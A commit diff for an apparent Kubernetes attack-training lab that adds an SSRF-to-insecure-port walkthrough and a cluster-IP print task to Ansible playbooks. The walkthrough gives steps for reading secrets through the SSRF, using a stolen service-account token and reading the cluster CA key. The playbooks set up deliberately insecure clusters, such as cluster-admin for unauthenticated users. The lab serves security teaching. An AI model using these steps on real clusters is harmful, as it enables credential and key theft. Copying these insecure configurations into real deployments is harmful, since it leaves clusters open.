Finish SSRF exercise and add cluster IP print to playbooks

Scenario Setups/ssrf-to-insecure-port.md

@@ -13,7 +13,9 @@ docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' ssh
 At this point, if you're running on a Linux host, you should be able to connect to the web application on the Docker network at
 
 ```
-http://[CLUSTERIP]:32001/
+http://127.0.0.1:32001/
 ```
 
-The username is `ssrftester` and the password is `ssrftester`
+The username is `ssrftester` and the password is `ssrftester`
+
+The insecure port is only availble on 127.0.0.1, but the other cluster services (inc. API server) should be available on the clusterip

Scenario Walkthroughs/ssrf-to-insecure-port.md

@@ -4,7 +4,11 @@ The application provides the facility to do GET and POST requests, so there's a
 
 One option would be
 
-1. Get a list of running pods using the GET SSRF endpoint
-  - http://[CLUSTERIP]:8080/api/v1/pods
-2. From that get the name of the kube-apiserver pod (it should be something like `kube-apiserver-ssrfinsecureport-control-plane`)
-3. Then execute our cat command for the ca.key file using the POST endpoint.
+1. Get a list of secrets using the GET SSRF endpoint
+  - http://127.0.0.1:8080/api/v1/secrets
+2. Get a secret that has privileges on the API server (e.g. clusterrole-aggregation-controller-token)
+3. Find the token: field and make a copy of it
+4. Base64 decode the token (one way to do that https://gchq.github.io/CyberChef)
+5. use the token to make requests to the exposed API server 
+   1. `kubectl --insecure-skip-tls-verify --token=[TOKEN] -shttps://[CLUSTERIP]:6443 get po -n kube-system`
+   2. `kubectl --insecure-skip-tls-verify --token=[TOKEN] -shttps://[CLUSTERIP]:6443 -n kube-system exec [APISERVERPOD] cat /etc/kubernetes/pki/ca.key`

ansible_tasks/print_cluster_ip.yml

@@ -0,0 +1,4 @@
+---
+  - name: Print the Cluster IP address
+    debug: 
+      msg: "The Cluster IP address is {{ ansible_default_ipv4.address }} "

demo-cluster.yml

@@ -36,4 +36,5 @@
     fetch:
       src: /etc/kubernetes/admin.conf
       dest: /tmp/demo-kubernetes-admin.conf
-      flat: yes
+      flat: yes
+  - import_tasks: ./ansible_tasks/print_cluster_ip.yml

etcd-noauth.yml

@@ -30,4 +30,5 @@
 
   tasks:
   - import_tasks: ./ansible_tasks/setup_kubeconfig.yml
+  - import_tasks: ./ansible_tasks/print_cluster_ip.yml
 

insecure-port.yml

@@ -30,4 +30,5 @@
 
   tasks:
   - import_tasks: ./ansible_tasks/setup_kubeconfig.yml
+  - import_tasks: ./ansible_tasks/print_cluster_ip.yml
 

kubeadm_configs/localinsecureport.yml

@@ -0,0 +1,23 @@
+
+# this config file contains all config fields with comments
+kind: Cluster
+apiVersion: kind.sigs.k8s.io/v1alpha3
+# patch the generated kubeadm config with some extra settings
+kubeadmConfigPatches:
+- |
+  apiVersion: kubeadm.k8s.io/v1beta2
+  kind: ClusterConfiguration
+  metadata:
+    name: config
+  apiServer:
+    extraArgs:
+      # Don't forget quotes on the values
+      insecure-bind-address: "127.0.0.1"
+      insecure-port: "8080"
+# 1 control plane node and 3 workers
+nodes:
+# the control plane node config
+- role: control-plane
+  extraPortMappings:
+    - containerPort: 8080
+      hostPort: 8080

manifests/ssrfdeployment.yml

@@ -12,6 +12,7 @@ spec:
       labels:
         run: ssrf
     spec:
+      hostNetwork: true
       containers:
       - name: ssrf
         image: raesene/ssrftester

rwkubelet-noauth.yml

@@ -30,4 +30,4 @@
 
   tasks:
   - import_tasks: ./ansible_tasks/setup_kubeconfig.yml
-
+  - import_tasks: ./ansible_tasks/print_cluster_ip.yml

ssh-to-cluster-master.yml

@@ -33,3 +33,5 @@
 
   - name: make the default service account cluster-admin
     command: kubectl --kubeconfig=/etc/kubernetes/admin.conf create clusterrolebinding serviceaccounts-cluster-admin --clusterrole=cluster-admin --group=system:serviceaccounts
+
+  - import_tasks: ./ansible_tasks/print_cluster_ip.yml

ssh-to-create-pods-easy.yml

@@ -40,4 +40,6 @@
     command: kubectl create -f /root/pod-manager.yml
 
   - name: Give the default service account rights to manage pods
-    command: kubectl create rolebinding serviceaccounts-pod-manager --role=pod-manager --group=system:serviceaccounts
+    command: kubectl create rolebinding serviceaccounts-pod-manager --role=pod-manager --group=system:serviceaccounts
+
+  - import_tasks: ./ansible_tasks/print_cluster_ip.yml

ssh-to-create-pods-hard.yml

@@ -40,4 +40,6 @@
     command: kubectl create -f /root/pod-creator.yml
 
   - name: Give the default service account rights to manage pods
-    command: kubectl create rolebinding serviceaccounts-pod-manager --role=pod-creator --group=system:serviceaccounts
+    command: kubectl create rolebinding serviceaccounts-pod-manager --role=pod-creator --group=system:serviceaccounts
+
+  - import_tasks: ./ansible_tasks/print_cluster_ip.yml

ssh-to-get-secrets.yml

@@ -40,4 +40,6 @@
     command: kubectl create -f /root/secret-reader.yml
 
   - name: Give the default service account rights to manage pods
-    command: kubectl create clusterrolebinding serviceaccounts-secret-reader --clusterrole=secret-reader --group=system:serviceaccounts
+    command: kubectl create clusterrolebinding serviceaccounts-secret-reader --clusterrole=secret-reader --group=system:serviceaccounts
+
+  - import_tasks: ./ansible_tasks/print_cluster_ip.yml

ssrf-to-insecure-port.yml

@@ -6,7 +6,7 @@
     cluster_name: ssrfinsecureport
     # This needs to be the cluster name with -control-plane added 
     container_name: ssrfinsecureport-control-plane
-    cluster_config: insecureport.yml
+    cluster_config: localinsecureport.yml
 
   tasks:
     - name: Start a kind cluster
@@ -31,5 +31,7 @@
   tasks:
   - import_tasks: ./ansible_tasks/setup_kubeconfig.yml
   - import_tasks: ./ansible_tasks/setup_ssrf_pod.yml
+  - import_tasks: ./ansible_tasks/print_cluster_ip.yml
+
 
 

tiller-noauth.yml

@@ -34,3 +34,5 @@
 
   - name: Expose Tiller via NodePort
     command: kubectl patch svc tiller-deploy -n kube-system --type='json' -p '[{"op":"replace","path":"/spec/type","value":"NodePort"}]'
+
+  - import_tasks: ./ansible_tasks/print_cluster_ip.yml

unauth-api-server.yml

@@ -32,3 +32,5 @@
 
   - name: cluster-admin Unauthenticated
     command: kubectl create clusterrolebinding unauth-cluster-admin --clusterrole=cluster-admin --group=system:unauthenticated
+
+  - import_tasks: ./ansible_tasks/print_cluster_ip.yml